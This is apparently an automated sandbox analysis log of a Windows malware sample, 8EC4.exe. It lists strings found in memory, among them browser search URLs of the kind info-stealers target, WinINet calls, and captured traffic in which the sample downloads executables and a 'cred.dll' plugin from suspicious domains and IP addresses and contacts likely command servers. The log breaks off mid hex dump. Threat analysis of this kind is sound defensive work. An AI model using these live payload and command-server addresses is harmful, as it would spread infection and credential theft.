Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8EC4.exe, 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: host-data-coin-11.com

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,HeapCreate,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

20_2_00404BE0

Source: global traffic	HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic	HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
Source: global traffic	HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
Source: global traffic	HTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
Source: global traffic	HTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
Source: global traffic	HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic	HTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic	HTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 19 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 